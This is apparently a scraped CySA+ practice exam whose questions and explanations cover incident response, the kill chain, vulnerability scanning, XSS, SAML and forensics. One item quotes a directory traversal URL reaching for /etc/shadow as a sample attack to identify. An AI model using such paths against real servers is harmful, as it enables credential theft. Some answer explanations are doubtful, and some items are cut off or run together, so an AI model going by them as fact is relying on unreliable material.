CompTIA CySA+ (CS0-003) Practice Exam #4

You work as the incident response team lead at Fail to Pass Systems. Sierra, a system administrator, believes an incident has occurred on the network and contacts the SOC. At 2:30 am, you are woken up by a phone call from the CEO of Fail to Pass stating an incident has occurred and that you need to solve this immediately. As you are getting dressed to drive into the office, your phone rings again. This time, the CIO starts asking you a lot of technical questions about the incident. The first you heard of this incident was 5 minutes ago from the CEO, so you obviously don't have the answers to the CIO's questions. Based on this scenario, which of the following issues needs to be documented in your lessons learned report once this incident is resolved? An established incident response form for all employees to use to collect data A call list/escalation list An offline incident response jump bag or kit A robust metho

A call list/escalation list To maintain a disciplined approach to incident response, the organization needs to document and follow procedures developed during the preparation phase. The SOC should have a call list or an escalation list as part of those procedures. This list should detail who should be called, what order, and how high up the organizational leadership chart a particular issue would reach. In almost every case, the incident response team lead should be contacted before the CEO or CIO is notified of the incident. When companies go "right to the top" of the leadership chart, the CEO and CIO will be acting on half-true or unverified information during the start of an incident response process. Instead, an established form for incident detail collection should be performed, the right technical leads should be notified of the incident, and the incident response team should be called in to analyze the information and provide a quick "stand up" report to leadership on what the issue is, what has already been done, and what they recommend doing from here to resolve the incident. All of the other options are best practices to consider and develop in the preparation phase. Still, they would not have solved the issue in this scenario of senior leadership being notified before the incident response team lead.

What is a buffer overflow vulnerability? A problem with the encryption of data An issue with a website's user interface An issue with the database query operation A weakness allowing an attacker to overflow an application's buffer, causing it to crash or execute arbitrary code

A weakness allowing an attacker to overflow an application's buffer, causing it to crash or execute arbitrary code A buffer overflow vulnerability indeed allows an attacker to overflow the buffer, possibly leading to a crash or the execution of arbitrary code. Database query operations might be vulnerable to SQL Injection, not buffer overflows. While important for user experience and potential phishing attacks, user interface issues are not directly related to buffer overflow vulnerabilities. Encryption problems are related to cryptography, not buffer overflow vulnerabilities.

In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent? Command and Control Actions and Objectives Weaponization Reconnaissance

Actions and Objectives The Actions and Objectives phase of the Cyber Kill Chain involves fulfilling the adversary's intent, such as data exfiltration, data destruction, or encryption for ransom. This is represented in the Colonial Pipeline attack by the DarkSide ransomware group encrypting files and demanding a ransom. Reconnaissance involves gathering information about the target system, not fulfilling the adversary's intent. Weaponization involves creating a malicious payload, not fulfilling the adversary's intent. Command and Control involves maintaining communication with the compromised system, not fulfilling the adversary's intent.

Referencing the infamous WannaCry ransomware attack, where the attackers exploited a vulnerability in Microsoft's SMB protocol using an NSA tool known as EternalBlue, which phase of the Cyber Kill Chain was the usage of EternalBlue part of? Command and Control Actions and Objectives Weaponization Delivery

Weaponization In the context of the WannaCry ransomware attack, the NSA tool, EternalBlue, was used during the weaponization phase to exploit a known vulnerability in Microsoft's SMB protocol. Command and control refers to the phase where the attacker establishes a channel to control the compromised system. Actions and Objectives phase would be when the attackers actually encrypted the files and demanded the ransom. The delivery phase involves the transmission of the malicious payload to the victim, not the creation of it.

Your organization has identified a threat actor offering stolen customer data for sale on a dark web forum. In this situation, what course of action might your threat intelligence team be expected to take? Contacting the threat actor to negotiate the return of the data Ignoring the threat because it's not an active breach Alerting the incident response team and working with them to mitigate any potential harm Launching a retaliatory cyber attack

Alerting the incident response team and working with them to mitigate any potential harm In the face of a potential threat like this, the threat intelligence team would generally alert the incident response team and work with them to protect the organization and its customers. It is not generally advisable, or often legal, for an organization to engage directly with threat actors. Professional security teams should be involved in these situations. Retaliatory cyber attacks are both legally and ethically problematic and could lead to serious consequences. This is not the right course of action. Ignoring a potential threat, particularly one that involves customer data, would not be a safe or responsible course of action.

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results? The scanner failed to connect with the majority of workstations An uncredentialed scan of the network was performed The scanner was not compatible with the devices on your network The network has an exceptionally strong security posture

An uncredentialed scan of the network was performed Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network's vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.

Which of the following type of solutions would you classify an FPGA as? Trusted platform module Anti-tamper Root of trust Hardware security module

Anti-tamper A field-programmable gate array (FPGA) is an anti-tamper mechanism that makes use of a type of programmable controller and a physically unclonable function (PUF). The PUF generates a digital fingerprint based on the unique features of the device. This means that tampering with a device, such as removing the chip or adding an unknown input/output mechanism, can be detected. A remedial action like using zero-filling cryptographic keys can be performed automatically. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. It is a solution that may be less susceptible to tampering and insider threats than a traditional software-based storage solution. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. A hardware root of trust (RoT) or trust anchor is a secure subsystem that can provide attestation to declare something as true.

An SNMP sweep is being conducted, but the sweep receives no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst? The community string being used is invalid The machines are not running SNMP servers Any listed answers may be true The machines are unreachable

Any listed answers may be true The best option is all of the answers listed. SNMP doesn't report closed UDP ports, and SNMP servers don't respond to invalid information requests. The "no response" can mean that the systems cannot be reached (either internally or externally). If you entered an invalid community string, then SNMP will be unable to provide a response or report its findings.

Michelle has just finished installing a new database application on her server. She then proceeds to uninstall the sample configuration files, properly configures the application settings, and updates the software to the latest version according to her company's policy. What best describes the actions Michelle just took? Input validation Vulnerability scanning Application hardening Patch management

Application hardening Application hardening involves taking actions to best secure the application from attack. This involves removing any default or sample configurations, properly configuring settings, and updating the application to the latest and more secure version. Patch management is incorrect because only updating the software falls under patch management, not the configuration portions of her actions. Vulnerability scanning involves scanning a device for known vulnerabilities to update the device and prevent a future attack. Input validation is a technique to verify user-provided data meets the expected length and type before allowing a program to utilize it.

According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC? Inventory of authorized/unauthorized devices Malware defenses Controlled use of administrative privileges Application software security

Application software security Since the software development lifecycle (SDLC) is focused on building software applications, the best control category would be application software security. While all other documents hosted by the Center for Internet Security contain useful information, the application software security control is most likely to contain relevant information relating to best practices to implement in the SDLC.

Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed? Attack vector Threat model Adversary capability set Attack surface

Attack surface The collection of all points from which an adversary may attack is considered the attack surface. The attack vector represents the specific points an adversary has chosen for a particular attack. The threat model defines the behavior of the adversary. An adversary capability set is the list of items an adversary can use to conduct their attack.

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? BGP looking glass usage Registrar checks WHOIS lookups Banner grabbing

Banner grabbing Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization's remote host.

In the event of a cybersecurity breach, what legal aspects should primarily be considered when communicating with external stakeholders? Public relations strategy Internal corporate policy Contractual obligations with clients or partners Compliance with data breach notification laws

Compliance with data breach notification laws Legal considerations primarily involve complying with local, national, or international data breach notification laws and regulations, which typically require the organization to notify affected parties within a certain timeframe. While internal policies are important, they do not typically carry the legal weight that breach notification laws do. Compliance with these laws should be a primary consideration. While managing public relations is a crucial aspect of breach communication, it does not directly involve legal considerations. While important, contractual obligations are specific to individual relationships and may not have the broad legal implications that breach notification laws do.

Upper management at DionTech Innovations has noticed that its employees frequently download potentially harmful attachments from phishing emails. What should the company do to mitigate this risk? Purchase new email software Fire all employees who download harmful attachments Conduct regular training sessions to teach employees how to recognize and avoid phishing emails Make employees sign a liability waiver for potential damages from phishing attacks

Conduct regular training sessions to teach employees how to recognize and avoid phishing emails Regular training plays a crucial role in mitigating the risk of employees falling victim to phishing attacks. By providing ongoing education and awareness programs, employees can become more knowledgeable about the tactics and techniques used in phishing attempts. This training equips them with the skills to recognize and report suspicious emails, links, or requests, thereby reducing the likelihood of falling for phishing scams. While this might discourage careless behavior, it does not equip employees with the knowledge to avoid phishing attempts. While this may seem like a direct solution, it is not practical or effective in the long term. Education is a more effective approach. While certain software may offer better spam filters, it cannot fully prevent phishing attempts, which often rely on social engineering.

Among the following vulnerabilities, which one was reported as a "Top 10" due to its common occurrence and the potential severity of its impact? Poodle Attack Cross-Site Scripting (XSS) SolarWinds SUNBURST Attack Spectre Attack

Cross-Site Scripting (XSS) XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as user data theft, making this the correct answer. The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability like XSS. The Spectre attack was an impactful hardware vulnerability, but it's not typically categorized as a top 10 vulnerability. While the Poodle Attack was significant and impacted SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability.

Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events? Cross-site request forgery SQL injection Cross-site scripting Rootkit

Cross-site scripting This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website's HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim's browser (such as creating pop-ups). A CSRF would allow an attack to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.

During a simulated attack on your organization's network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent? Diamond Model of Intrusion Analysis OWASP Testing Guide Cyber Kill Chain MITRE ATT&CK

Cyber Kill Chain The Cyber Kill Chain, developed by Lockheed Martin, describes the stages of a cyber attack. The steps taken by the red team align with this model, from the identification of vulnerabilities (reconnaissance), through exploitation and installation, to achieving their objectives (exfiltration). The OWASP Testing Guide provides a methodology for testing the security of web applications. It doesn't describe the stages of a cyber attack. The Diamond Model focuses on the relationship between four elements of an attack: the adversary, the victim, the infrastructure, and the capability. It doesn't represent a sequential progression of an attack. The MITRE ATT&CK framework provides a matrix of tactics, techniques, and procedures (TTPs) used by cyber adversaries. While it's useful for detailing attacker behavior, it doesn't provide a linear progression of an attack.

You have just run the following commands on your Linux workstation: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DionTraining:~ root# ls Names.txt DionTraining:~ root# more Names.txt DION DIOn DIon Dion dion DionTraining:~ root# grep -i DION Names.txt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY) DIOn Dion DION dion Dion

DIOn Dion DION dion Dion The grep (global search for regular expressions and print) is one of Linux's powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word "DION" will be presented from the file and displayed as the command output. By default, grep uses case sensitivity, so "grep DION Names.txt" would only display the output as "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.

After an unexpected data breach, the cybersecurity team at a financial institution analyzed logs and found suspicious traffic originating from an IP address known to be linked with the WannaCry ransomware attack. In this scenario, what incident response activity is being performed by the cybersecurity team? Recovery Eradication Data and log analysis Containment

Data and log analysis The cybersecurity team is performing data and log analysis, a key incident response activity. They are analyzing logs to identify the cause of the data breach and determine the extent of the intrusion. Recovery involves restoring systems to normal operation and implementing measures to prevent future similar attacks. The team hasn't reached this stage yet; they are still analyzing logs to understand what happened. Containment is the process of limiting the extent of an intrusion and preventing it from spreading further. In this scenario, the team is analyzing data and logs, not containing the breach. Eradication involves eliminating the threat from the network, which can't be done until the threat is fully understood. The team is still at the analysis stage.

You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it? Data recovery Data correlation Data retention Data sanitization

Data correlation Data correlation is the first step in making sense of data from across numerous sensors. This will ensure the data is placed concerning other pieces of data within the system. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM could be used to correlate all three pieces of information from these different systems to allow an analyst to understand the event better. By conducting data correlation, it allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data.

During which phase of the Cyber Kill Chain would an attacker transmit the malicious payload to the victim, typically via email, web, or USB? Command and Control Delivery Reconnaissance Installation

Delivery The delivery phase of the Cyber Kill Chain involves transmitting the malicious payload to the victim. Command and Control involves maintaining communication with the compromised system, not delivering the malicious payload. Reconnaissance involves gathering information about the target system, not delivering the malicious payload. Installation involves the payload setting up a foothold on the compromised system, not delivering the malicious payload.

Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a penetration test? Social engineering Reverse engineering Denial-of-service attacks Physical penetration attempts

Denial-of-service attacks A denial-of-service or DoS attack isn't usually included as part of a penetration test. This type of attack contains too much risk for an organization to allow it to be included in an assessment scope. Social engineering, physical penetration attempts, and reverse engineering are all commonly included in a penetration test's scope.

Which of the following types of capabilities would an adversary need to identify and exploit zero-day vulnerabilities? Developed Advanced Integrated Acquired and augmented

Developed According to the MITRE ATT&CK framework, developed capabilities can identify and exploit zero-day vulnerabilities. Acquired and augmented refers to the utilization of commodity malware and techniques (i.e., script kiddies). Advanced capabilities refer to those that can introduce vulnerabilities through the supply chain in proprietary and open-source products. Integrated capabilities involve non-cyber tools such as political or military assets.

Which of the following will an adversary so during the delivery phase of the Lockheed Martin kill chain? (SELECT THREE) Collect press releases, contract awards, and conference attendee lists Direct action against public-facing servers Adversary triggering exploits for non-public facing servers Deliberate social media interactions with the target's personnel Select a decoy document to present to the victim Release of malicious email

Direct action against public-facing servers Deliberate social media interactions with the target's personnel Release of malicious email During the delivery phase, the adversary is firing whatever exploits they have prepared during the weaponization phase. At this stage, they still do not have access to their target, though. Therefore, taking direct action against a public-facing web server, sending a spear-phishing email, placing a USB drive with malware, or starting a conversation on social media all fit within this phase. internet-facing servers were enumerated during reconnaissance. Selecting a decoy document to present to the victim occurs during weaponization. Collecting press releases, contract awards, and conference attendee lists occur during the reconnaissance phase.

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http:(Slash)(Slash)test.diontraining.com(Slash)..(Slash)..(Slash)..(Slash)..(Slash)etc(Slash)shadow. What type of attack has likely occurred? XML injection Buffer overflow SQL injection Directory traversal

Directory traversal This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (..(Slash))" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input.

As part of your organization's proactive threat hunting, you're considering gathering threat intelligence from the deep web and dark web. What could be a significant benefit of this approach? Discovering potential threats before they impact your organization Eliminating all cyber threats Increasing the organization's web presence Avoiding the need for other security measures

Discovering potential threats before they impact your organization Gathering threat intelligence from the deep web and dark web can help your organization identify emerging threats or planned attacks before they affect your network. While gathering intelligence can help identify and mitigate threats, it does not guarantee the elimination of all cyber threats. Gathering threat intelligence is a part of a broader security strategy and should be used in conjunction with other security measures, not in lieu of them. Gathering threat intelligence from the deep web and dark web is not related to increasing an organization's web presence; it's about identifying potential cyber threats.

Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it? Analysis Collection Dissemination Feedback

Dissemination The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers' input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.

CIO has recently made a purchasing decision to install a new security appliance that will automatically sandbox all attachments as they enter the enterprise network to run dynamic and static code analysis on them. Which of the following questions about the appliance should you consider as the SOC manager responsible for operating this new appliance for the company? (SELECT FOUR) Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious? How will the appliance receive security patches and updates? Will the device inadvertently alter anyone's data when it is analyzed in the sandbox? Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate? Will the security appliance violate your employee's right to privacy? How will the appliance receive updated signatures and scanning engines?

Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious? How will the appliance receive security patches and updates? Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate? How will the appliance receive updated signatures and scanning engines? Often, cybersecurity professionals fall in love with a new technological solution without fully considering the true cost of ownership and risks it poses to their organization. Even if this is the perfect security mechanism, the organization must plan for how they will respond to the alerts provided by this appliance. Additionally, you must consider if you have the right people and procedures to use the new application effectively. The appliance will also need to receive security patches, feature updates, and signature definition files routinely to remain effective and secure. At later stages of analysis, your security team may need to determine why a false-positive or false-negative occurred, which requires detailed alerts or reports from the machine. In corporate environments, privacy is limited for employees as most companies have a "right to monitor" included as part of their AUP and access policies. Therefore privacy is a minimal area of concern in this case. The appliance cannot manipulate the information passing through it since it will analyze the information by placing a copy into a sandbox. This allows it to make a allow or deny decision and will not modify the original data is processed.

When using the netstat command during an analysis, which of the following connection status messages indicates whether an active connection between two systems exists? LISTENING LAST_ACK ESTABLISHED CLOSE_WAIT

ESTABLISHED The ESTABLISH message indicates that an active and established connection is created between two systems. The LISTENING message indicates that the socket is waiting for an incoming connection from the second system. The LAST_ACK message indicates that the remote end has shut down the connection, and the socket is closed and waiting for an acknowledgment. The CLOSE_WAIT message indicates that the remote end has shut down the connection and is waiting for the socket to close. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goals aren't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!

Which of the following proprietary tools is used to create forensic disk images without making changes to the original evidence? Autopsy dd FTK Imager Memdump

FTK Imager FTK Imager can create perfect copies or forensic images of computer data without making changes to the original evidence. The forensic image is identical in every way to the original, including file slack and unallocated space or drive free space. The dd tool can also create forensic images, but it is not a proprietary tool since it is open-source. Memdump is used to collect the content within RAM on a given host. Autopsy is a cross-platform, open-source forensic tool suite.

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which of the following is the laboratory performing? Security regression testing Fuzzing Stress testing User acceptance testing

Fuzzing Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security, are therefore of high significance, and the interest in such approaches has steadily increased. Stress testing verifies the system's stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

Which role validates the user's identity when using SAML for authentication? User agent RP IdP SP

IdP The IdP provides the validation of the user's identity. Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal's credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

In order to improve efficiency in your security operations, you want to minimize human engagement. Which of the following actions would be most effective in achieving this goal? Increasing the number of security platforms Implementing automation for routine tasks Reducing staff training Limiting access to systems

Implementing automation for routine tasks Automating routine tasks can help reduce the need for human engagement in security operations. It also allows staff to focus on higher-level tasks that require human judgment. Reducing staff training might lead to more errors and lower efficiency, as staff may not be up-to-date on latest trends and threats. Using multiple security platforms can lead to siloed information and an increased need for human engagement to manage and coordinate between the platforms. Limiting access can improve security but might not necessarily reduce the need for human engagement. In fact, it might increase the need for human oversight to manage access control.

You are a security analyst at Dion Training Labs and have noticed an employee logging into the company's secure system from Tokyo, then again from Paris just 30 minutes later. What security alert does this scenario best represent? Impossible Travel AbuseIPDB Pattern Recognition Interpreting Suspicious Commands

Impossible Travel This alert indicates that a user's account has been used to log in from two distant locations within a time frame shorter than the possible travel time between the locations, signaling potential unauthorized access. AbuseIPDB is a tool used to check IP addresses for reported malicious activity, it would not necessarily detect geographically improbable logins based on the information available. Interpreting suspicious commands is a useful skill for identifying potentially malicious actions on a system, but it's not directly related to detecting geographically improbable logins. Pattern recognition involves identifying repeating trends or anomalies in data, which might not directly relate to this specific scenario of geographically improbable logins.

Your organization, a healthcare provider, has just experienced a significant cyber-attack resulting in the compromise of patient records. In response, the organization immediately activates a predefined set of guidelines designed to handle such a situation, which includes procedures for communication, investigation, and mitigation. What term best describes this set of guidelines? Business continuity disaster recovery planning Incident response plan Tabletop exercises Training

Incident response plan The incident response plan outlines the procedures and processes to handle and manage a security incident. It's an essential part of preparation for potential incidents. Tabletop exercises are a method of testing an organization's incident response plan and team, not establishing procedures for managing incidents. While training is an important part of preparation, it involves educating the workforce about potential incidents and how to respond, not outlining procedures for managing potential incidents. Business continuity disaster recovery planning focuses on how an organization can continue operations during and recover after a disruptive incident, not on outlining procedures for handling potential incidents.

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant's security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems? Intrusion prevention system Automated patch deployment Anti-virus software Log consolidation

Intrusion prevention system Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Antivirus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.

What is the significance of root cause analysis in the aftermath of a security incident? It helps in recovering data lost during the incident It provides a basis for communicating with the media It is used for assigning blame for the incident It aids in understanding the factors that led to the incident, helping to prevent occurrences in the future

It aids in understanding the factors that led to the incident, helping to prevent occurrences in the future Root cause analysis is crucial for understanding what caused the incident, enabling organizations to implement measures to prevent similar incidents from happening in the future. The main goal of root cause analysis is not to assign blame, but to understand what led to the incident so that similar issues can be prevented. Root cause analysis does not directly assist in data recovery. It focuses on understanding the cause of the incident. While findings from root cause analysis may be used to inform communications, its primary purpose is not to provide a basis for media interaction.

Your company's cybersecurity team has been tracking vulnerability data over time. What might be the significance of observing a consistent upward trend in the discovery of new vulnerabilities? The company's network bandwidth is being utilized efficiently The company's servers are becoming more efficient It could indicate a need for improved security measures or updated software There is a decreased need for vulnerability scanning

It could indicate a need for improved security measures or updated software An upward trend in vulnerabilities may signal a need to enhance cybersecurity defenses. On the contrary, an upward trend would indicate an increased need for thorough vulnerability scanning. Network bandwidth usage isn't directly related to the trend in vulnerability discoveries. While efficiency is important, an upward trend in vulnerability discoveries is not an indicator of server efficiency.

Your company has noticed a significant increase in the mean time to detect (MTTD) and mean time to respond (MTTR) to incidents. What is a potential impact of these increased metrics? It increases the legal protection against cyber attacks It improves the company's public image It results in a decrease in security alert volume It might lead to a greater impact of security incidents

It might lead to a greater impact of security incidents An increase in MTTD and MTTR suggests a slower reaction to incidents, which can allow threats to cause more damage before they are detected and addressed. These metrics don't provide legal protection. They measure organizational effectiveness in detecting and responding to incidents. MTTD and MTTR metrics don't directly impact the volume of security alerts. They measure the speed of detection and response. Increased MTTD and MTTR are unlikely to improve a company's public image; in fact, they might harm the company's reputation if they result in a significant breach.

John is a cybersecurity consultant that wants to sell his services to an organization. In preparation for his first meeting with the client, John wants to conduct a vulnerability scan of their network to show the client how much they need his services. What is the most significant issue with John conducting this scan of the organization's network? The client's infrastructure design is unknown to John The IP range of the client systems is unknown by John John does not know what operating systems and applications are in use John does not have permission to perform the scan

John does not have permission to perform the scan All options listed are an issue, but the most significant issue is that John does not have the client's permission to perform the scan. A vulnerability scan may be construed as a form of reconnaissance, penetration testing, or even an attack on the organization's systems. A cybersecurity analyst should never conduct a vulnerability scan on another organization's network without explicit written permission. In some countries, a vulnerability scan against an organization's network without their permission is considered a cybercrime and could result in jail time for the consultant.

How could a company's reluctance to interrupt its business processes potentially impact its vulnerability management? Leading to postponed or overlooked system updates and patches Increasing the company's overall market share Enhancing the effectiveness of the company's marketing strategies Boosting employee productivity during work hours

Leading to postponed or overlooked system updates and patches Avoiding interruptions could cause delays or oversights in system maintenance, including the application of important updates and patches. While avoiding interruptions may maintain productivity, it doesn't directly impact vulnerability management. Business process continuity does not have a direct correlation with the effectiveness of marketing strategies. While uninterrupted operations may contribute to business success, this is not directly related to vulnerability management.

You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence of a backdoor related to a Linux service? (slash)etc(slash)xinetd.conf $HOME(slash).ssh(slash) (slash)etc(slash)passwd (slash)etc(slash)shadow

Linux services are started by xinetd, but some new versions use sytemctl. Therefore, the etc(slash)xinetd.conf should be analyzed for any evidence of a backdoor being started as part of the Linux services. Both the (slash)etc(slash)passwd and (slash)etc(slash)shadow files contain configurations specifically associated with individual user accounts. The home(slash).ssh directory contains SSH keys for SSH-based logins.

Your security team is analyzing a recent cyber attack on your organization's network. They want to understand the attacker's behavior, tactics, techniques, and procedures. Which framework is BEST suited for this purpose? Cyber Kill Chain MITRE ATT&CK Diamond Model of Intrusion Analysis OWASP Testing Guide

MITRE ATT&CK The MITRE ATT&CK framework provides a comprehensive matrix of tactics, techniques, and procedures (TTPs) used by attackers, making it a powerful tool for understanding attacker behavior. The Diamond Model focuses on the relationship between the adversary, victim, infrastructure, and capability, rather than the detailed tactics, techniques, and procedures used by the attacker. While the Cyber Kill Chain can provide some insight into an attacker's actions, it primarily describes the linear progression of a cyberattack, not the detailed tactics, techniques, and procedures used. The OWASP Testing Guide is focused on web application security testing, not on understanding attacker behavior.

You are conducting an incident response and want to determine if any account-based indicators of compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on the server? Failed logins Malicious processes Unauthorized sessions Off-hours usage

Malicious processes A malicious process is one that is running on a system and is outside the norm. This is a host-based indicator of compromise (IOC) and not directly associated with an account-based IOC. Off-= hours usage, unauthorized sessions, and failed logins are all account-based examples of an IOC. Off-hours usage occurs when an account is observed to log in during periods outside of normal business hours. An attacker often uses this to avoid detection during business hours. Unauthorized sessions occur when a device or service is accessed without authorization. For example, if a limited privilege user is signed into a domain controlled. A failed login might be normal if a user forgets or incorrectly types their password, but repeated failures for one account could also be an indication of an attacked to crack a user's password.

How can the fear of business process interruption potentially inhibit the remediation of identified vulnerabilities? May lead to delays in performing system maintenance and patching Fear of interruption ensures immediate remediation of all vulnerabilities The potential for interruption incentivizes the enhancement of system functionality Fear of interruption reduces the number of vulnerabilities

May lead to delays in performing system maintenance and patching Interruption concerns may push organizations to delay necessary vulnerability remediation, prolonging system exposure to risks. Fear of interruption does not directly enhance system functionality. Fear of interruption might in fact delay necessary actions, not accelerate them. Fear of interruption does not inherently reduce vulnerabilities; it may delay their remediation.

While monitoring the health of her organization's systems, Lisa notices that a system's processes are using an unusually high amount of memory. What is Lisa checking? Data storage Memory resource management Memory consumption Data encryption

Memory consumption Memory consumption refers to the precise measurement of the quantity of memory that is being actively utilized by the various processes within a system. It serves as a crucial indicator of the system's resource allocation and utilization efficiency. Consequently, when the analyst identifies a discernibly elevated level of memory usage within the system, they are effectively overseeing and scrutinizing the specific aspect of memory consumption. Data encryption, while important for data security, doesn't involve monitoring the amount of memory used by a system's processes. Memory resource management is about efficiently utilizing a system's memory. Data storage is about holding data, not about monitoring the memory usage of a system's processes.

Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan? Only an approved scanning vendor Only employees of the company Any qualified individual Anyone

